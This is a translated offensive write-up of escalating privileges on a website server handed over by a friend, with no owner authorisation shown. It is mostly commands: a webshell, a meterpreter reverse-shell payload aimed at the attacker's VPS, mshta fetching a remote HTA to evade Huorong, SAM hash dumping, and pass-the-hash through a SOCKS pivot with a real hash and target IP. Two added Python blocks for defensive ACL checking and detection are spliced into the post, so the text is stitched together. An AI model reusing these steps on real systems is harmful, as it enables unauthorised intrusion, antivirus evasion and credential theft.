
Title: A practical record of bypassing Huorong Security for privilege escalation


0x01 Introduction

A friend sent me a website and asked me to help look at privilege escalation. The server had security software such as Guardian Host Master, Huorong and Server Security Dog installed, which looks quite intimidating. He had also tried many of the commonly used privilege-escalation EXPs, all of which failed; maybe the EXPs were being killed by the AV, or maybe those vulnerabilities had already been patched. I took some time to look at it for him and wrote up this record.

After obtaining access, I connected with China Chopper, but it seemed to be intercepted, with the prompt: "The server returns an invalid or unrecognized response." I have run into this situation many times before; just switching to Godzilla connects normally.

0x02 Collect basic information of server

Although my friend provided some information after his tests, I am still used to looking myself, because everyone has different knowledge and practical experience. Only after looking myself do I know which environment, WAF/AV and third-party software are installed, which ports are open, how many patches have been applied, and so on, so as to better test the system's weak points.

Target system: Windows 2008 R2 (6.1 Build 7601, Service Pack 1)
Current privileges: iis apppool\****.com
Supported scripts: ASP, ASPX, PHP; system commands can be executed directly
Open ports: 21 (ftp), 80 (http), 135 (rpc), 443 (https), 445 (smb), 801 (http), 3306 (mysql), 2121 (G6FTP), 8021 (G6FTP), 6588 (hws), 58895 (TermService)
Process names: G6FTPServer.exe, G6FTPTray.exe, HwsHostPanel.exe, mysqld.exe, php-cgi.exe, SafeDogUpdateCenter.exe, CloudHelper.exe, SafeDogGuardCenter.exe, SafeDogGuardCenter.exe, SafeDogGuardHelper.exe, SafeDogGuardHelper.exe, SafeDogGuardHelper.exe, HipsTray.exe, HipsDaemon.exe, usysdiag.exe


The server runs Huorong, Guardian Host Master, Server Security Dog, a MySQL database and G6FTP. The candidates for privilege escalation are Guardian Host Master, MySQL and G6FTP. However, during escalation you must watch out for detection and interception by Huorong and Server Security Dog, so as to avoid being discovered by the administrator as far as possible.


0x03 Bypass Huorong to get an MSF session

Personally I am used to escalating privileges under MSF, so the first step is to find a way to get a session. Huorong intercepts powershell execution and kills hta_server's hta file by default, so neither of those two methods works here. So we directly use the mshta whitelist binary to obtain the MSF session. First, execute the following commands to generate the shellcode and start the listener, then replace the shellcode in the exp.hta file with the MSF shellcode.

[root@p1600778655 ~]# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=155.**.***.16 lport=443 -f raw > /tmp/shellcode.bin
[root@p1600778655 ~]# cat /tmp/shellcode.bin | base64 -w 0

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lport 443
msf6 exploit(multi/handler) > exploit


Then we use Python to start a temporary web server on the VPS for remote retrieval, go to the command-execution function of the ASPX big webshell, and execute the exp.hta file with the system's built-in mshta.exe; the session then comes online.

python -m SimpleHTTPServer 8888
python3 -m http.server 8888


0x04 Exporting hashes via the SAM registry key

My friend had already tested many EXPs earlier. In addition, Guardian Host Master is a newer version and MySQL runs with reduced privileges, so I will not test those conventional methods again. G6FTP could still be tried, but I am using a different, unconventional method. The principle is very simple: directly use the method mentioned in the article 《西部数码云主机失败提权案例》. When the SAM registry key grants Users or Everyone read permission, you can use the hashdump module under MSF to export the hashes.

meterpreter > getuid
meterpreter > load powershell
meterpreter > powershell_shell
PS > Get-Acl -Path HKLM:\SAM\SAM | Format-List
meterpreter > run post/windows/gather/hashdump
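As an added defensive check that is not part of the original post: a small Python parser for the Sddl field that `Get-Acl -Path HKLM:\SAM\SAM | Format-List` prints, flagging any Allow ACE that gives Everyone, Users, Authenticated Users or Interactive a read right on the key (the tight configuration grants only SYSTEM full control and Administrators ReadControl + WriteDAC). The Format-List excerpt and SDDL strings below are constructed, not taken from the target.

```python
import re

# Constructed excerpt of `Get-Acl -Path HKLM:\SAM\SAM | Format-List` output (not from the target).
FORMAT_LIST_OUTPUT = """Path  : Microsoft.PowerShell.Core\\Registry::HKEY_LOCAL_MACHINE\\SAM\\SAM
Owner : NT AUTHORITY\\SYSTEM
Sddl  : O:SYG:SYD:P(A;CI;KA;;;SY)(A;CI;RCWD;;;BA)(A;CI;KR;;;BU)
"""

# Broad principals that must never be able to read the SAM hive key.
BROAD_SIDS = {"WD": "Everyone", "BU": "Users", "AU": "Authenticated Users", "IU": "Interactive"}
# SDDL rights tokens that imply read access to a registry key.
READ_TOKENS = {"GA", "GR", "KA", "KR"}
# GENERIC_READ | GENERIC_ALL | KEY_QUERY_VALUE | KEY_ENUMERATE_SUB_KEYS, for hex-encoded rights.
READ_MASK = 0x80000000 | 0x10000000 | 0x0001 | 0x0008

ACE_RE = re.compile(r"\(([^;]*);([^;]*);([^;]*);([^;]*);([^;]*);([^)]*)\)")
DACL_RE = re.compile(r"D:[A-Z]*((?:\([^)]*\))+)")

def sddl_from_format_list(text: str) -> str:
    """Pull the Sddl field out of pasted Format-List output."""
    m = re.search(r"^Sddl\s*:\s*(\S+)", text, re.M)
    if not m:
        raise ValueError("no Sddl line found")
    return m.group(1)

def rights_grant_read(rights: str) -> bool:
    """True if an SDDL rights field (two-letter tokens or a hex mask) conveys read access."""
    if rights.lower().startswith("0x"):
        return bool(int(rights, 16) & READ_MASK)
    tokens = {rights[i:i + 2] for i in range(0, len(rights), 2)}
    return bool(tokens & READ_TOKENS)

def weak_sam_aces(sddl: str) -> list:
    """Return (principal, rights) for every Allow ACE that lets a broad group read the key."""
    m = DACL_RE.search(sddl)
    if not m:
        return []
    findings = []
    for ace_type, _flags, rights, _obj, _inh, sid in ACE_RE.findall(m.group(1)):
        if ace_type == "A" and sid in BROAD_SIDS and rights_grant_read(rights):
            findings.append((BROAD_SIDS[sid], rights))
    return findings

if __name__ == "__main__":
    for principal, rights in weak_sam_aces(sddl_from_format_list(FORMAT_LIST_OUTPUT)):
        print(f"WEAK: {principal} has read access ({rights}) on HKLM\\SAM\\SAM")
```

Any finding here means the hive can be read by a low-privileged account and the key's DACL should be reset to the tight configuration.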

0x05 atexec to obtain SYSTEM privileges

The host hashes have been exported thanks to the SAM registry key permission problem, but some problems remain: there is no clear-text password, the hash cannot be cracked, users cannot be added, and so on. How should we proceed with testing in this scenario?

At this point we can try a remote command-execution tool that supports pass-the-hash to execute system commands. Here we use atexec from the remote command-execution functions of the Impacket suite to demonstrate. Other tools and methods that support pass-the-hash are as follows.

Port 135: WMIcmd / sharpwmi / WMIHACKER / Sharp-WMIExec
Impacket: psexec (445) / wmiexec (135) / smbexec (445) / atexec (445)
Ways to use them: local execution, a Socks4/5 proxy, or the Metasploit virtual routing table

Here we first add the current MSF session to the virtual route, then use the socks_proxy module to open a socks5 proxy, modify the proxychains.conf configuration file, and finally use the proxychains proxy tool to execute atexec.

meterpreter > run get_local_subnets
meterpreter > run autoroute -s 59.***.***.0/255.255.255.0
meterpreter > bg

msf6 auxiliary(server/socks_proxy) > set username test
msf6 auxiliary(server/socks_proxy) > set password 123456
msf6 auxiliary(server/socks_proxy) > run

Kali's proxychains configuration is /etc/proxychains.conf by default; for a proxychains4 compiled and installed by yourself, the configuration is in src/proxychains.conf under the source root directory. I won't explain how to modify it; there are examples in the configuration file.

[root@p1600778655 src]# vi /srv/proxychains/src/proxychains.conf

When executing atexec through the proxychains proxy tool, an error may be reported and there is no command-execution echo, but we can first run ping 9o**mf.dnslog.cn to see whether execution succeeded: if DNSLog receives data, it worked.

[root@p1600778655 ~]# proxychains4 -f /srv/proxychains/src/proxychains.conf python3 /srv/impacket/examples/atexec.py -hashes :ebdccc154cadcda7f5ef0a2149274f3c administrator@59.***.***.230 'cmd /c ping 9o**mf.dnslog.cn'

After confirming that command execution succeeds, we open another terminal and start the MSF listener, then use the proxychains proxy tool to run atexec and execute the exp.hta file used earlier, which gives us SYSTEM on the target host.

meterpreter > run get_local_subnets
meterpreter > run autoroute -s 59.***.***.0/255.255.255.0
meterpreter > bg
msf6 auxiliary(server/socks_proxy) > set username test
msf6 auxiliary(server/socks_proxy) > set password 123456
msf6 auxiliary(server/socks_proxy) > run

Pitfall record 1: If the current MSF session is not added to the virtual route, then even with the Socks5 proxy enabled, proxychains cannot be used to execute atexec and an error is reported. This is because MSF's Socks module opens the Socks proxy on the VPS, which cannot communicate with the target's port 445 until the virtual route is added. The exception is when a Socks proxy is started on the target host itself and connected to locally, so that communication with the target's port 445 goes through it.

Pitfall record 2: The Socks proxy traffic is open, but when using proxychains to execute atexec an error occurred, there was no command-execution echo, and the file was not written when a command such as whoami > 1.txt was executed. Of course, this may just be an individual case in this environment, but we can judge whether execution succeeded with the ping dnslog command.
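For the two techniques used on this host (mshta.exe fetching a remote .hta from the webshell in 0x03, and commands run through a remotely created scheduled task with atexec in 0x05), here is an added detection example in Python that is not part of the original post: it evaluates process-creation events shaped like Sysmon Event ID 1 fields. The events are constructed, the IP is a documentation address, and the temp-file rule assumes the atexec output-capture pattern (command output redirected to a random .tmp under the Windows Temp directory).

```python
import re
from pathlib import PureWindowsPath

# Constructed process-creation events (Sysmon Event ID 1 style fields); not telemetry from the post.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c mshta http://203.0.113.10:8888/exp.hta"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta http://203.0.113.10:8888/exp.hta"},
    {"ParentImage": r"C:\Windows\System32\taskeng.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /C whoami > C:\Windows\Temp\hZtqxOrb.tmp 2>&1"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe C:\Program Files\Vendor\setup.hta"},
    {"ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe", "Image": r"C:\php\php-cgi.exe",
     "CommandLine": r"php-cgi.exe"},
]

URL_RE = re.compile(r"https?://", re.I)
# Output redirected to a random .tmp in the Windows Temp directory (assumed atexec capture pattern).
TEMP_REDIRECT_RE = re.compile(r">\s*(?:%windir%|C:\\Windows)\\Temp\\\S+\.tmp\s+2>&1", re.I)
WEB_WORKERS = {"w3wp.exe", "php-cgi.exe"}        # IIS worker and FastCGI host seen on the target
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "mshta.exe", "rundll32.exe"}
TASK_HOSTS = {"taskeng.exe", "svchost.exe"}       # scheduled-task launchers (2008 R2 uses taskeng.exe)

def classify(event: dict) -> list:
    """Return the names of the detection rules that the event matches."""
    image = PureWindowsPath(event["Image"]).name.lower()
    parent = PureWindowsPath(event["ParentImage"]).name.lower()
    cmd = event["CommandLine"]
    hits = []
    # Rule 1: mshta pulling an .hta over HTTP(S), the whitelist-binary technique from 0x03.
    if (image == "mshta.exe" or "mshta" in cmd.lower()) and URL_RE.search(cmd):
        hits.append("mshta-remote-hta")
    # Rule 2: a web worker spawning a shell or LOLBin, i.e. command execution from a webshell.
    if parent in WEB_WORKERS and image in SHELL_CHILDREN:
        hits.append("webshell-child-process")
    # Rule 3: a scheduled task running cmd with output captured to a temp file, as atexec does (0x05).
    if parent in TASK_HOSTS and image == "cmd.exe" and TEMP_REDIRECT_RE.search(cmd):
        hits.append("scheduled-task-temp-redirect")
    return hits

def scan(events: list) -> list:
    """Return (index, rule names) for every event that matched at least one rule."""
    return [(i, classify(e)) for i, e in enumerate(events) if classify(e)]

if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(rules)} :: {SAMPLE_EVENTS[idx]['CommandLine']}")
```

Rule 3 fires on the task's child process rather than on the task-creation event, so it still works where Security log task auditing (4698) is not enabled.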


0x06 Summary

1. Successfully connect to the one-liner webshell through Godzilla.
2. Execute the systeminfo command and find the system is Windows 2008 R2 SP1.
3. Execute whoami and find iis privileges; execute netstat -ano and find ports 21, 80, 445, 801, 3306 and others open.
4. Execute tasklist /svc and, by comparing the process list against an online AV-process lookup, find that the target has Guardian, Huorong and Security Dog protection software, as well as the MySQL database and G6FTP.
5. Execute the following command to generate the shellcode and start the listener:
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=155.124.145.16 lport=443 -f raw > /tmp/shellcode.bin
6. View shellcode.bin and output it base64-encoded:
cat /tmp/shellcode.bin | base64 -w 0
msf6 > set payload windows/meterpreter/reverse_tcp
msf6 > set lhost 155.124.145.16
msf6 > set lport 443
msf6 > exploit
7. Create a custom exp.hta and replace the shellcode in it with the MSF shellcode:
<script language='VBScript'>
Dim binary:binary='rundll32.exe'
dim code:code='shellcode.bin content base64'
8. Use Python on the VPS to start a temporary web server for remote retrieval:
python -m SimpleHTTPServer 8888
python3 -m http.server 8888
9. Upload the ASPX big webshell through Godzilla and execute cmd with path c:\windows\system32\cmd.exe and argument /c mshta http://155.124.145.16/exp.hta
10. When the SAM registry key grants Users or Everyone read permission, use the hashdump module under MSF to export the hashes:
meterpreter > getuid
meterpreter > load powershell
meterpreter > powershell_shell
PS > Get-Acl -Path HKLM:\SAM\SAM | Format-List
meterpreter > run post/windows/gather/hashdump
11. The host hashes were exported via the SAM registry key permission issue, but they cannot be cracked.
12. First add the current MSF session to the virtual route:
meterpreter > run get_local_subnets
meterpreter > run autoroute -s 59.***.***.0/255.255.255.0
meterpreter > bg
13. Use the socks_proxy module to start a socks5 proxy:
msf6 auxiliary(server/socks_proxy) > set username test
msf6 auxiliary(server/socks_proxy) > set password 123456
msf6 auxiliary(server/socks_proxy) > run
14. Kali's proxychains configuration is /etc/proxychains.conf by default; for a proxychains4 compiled and installed by yourself, the configuration is in src/proxychains.conf under the source root directory. I won't explain how to modify it; there are examples in the configuration file.
[root@p1600778655 src]# vi /srv/proxychains/src/proxychains.conf
15. When executing atexec through the proxychains proxy tool, an error may be reported and there is no command-execution echo, but we can first run ping 9o**mf.dnslog.cn to see whether execution succeeded; if DNSLog receives data, it worked:
proxychains4 -f /srv/proxychains/src/proxychains.conf python3 /srv/impacket/examples/atexec.py -hashes :ebdccc154cadcda7f5ef0a2149274f3c administrator@59.***.***.230 'cmd /c ping 9o**mf.dnslog.cn'
16. Start another terminal and enable MSF listening, then use the proxychains proxy tool to execute atexec; here you can get SYSTEM on the target host:
msf6 auxiliary(server/socks_proxy) > sessions -i 1
meterpreter > run get_local_subnets
meterpreter > run autoroute -s 59.***.***.0/255.255.255.0
meterpreter > bg
msf6 auxiliary(server/socks_proxy) > set username test
msf6 auxiliary(server/socks_proxy) > set password 123456
msf6 auxiliary(server/socks_proxy) > run

Original link: https://mp.weixin.qq.com/s?__biz=Mzg4NTUwMzM1Ng==mid=2247488543idx=1sn=0e300f65f1425e035fcd8cdb9f3dd38cchksm=cfa6b00cf8d1391aeaae7cb2e7839f041e4c1264df495cbc5d91963820ca617872c95758e063scene=178cur_album_id=1553386251775492098#rd
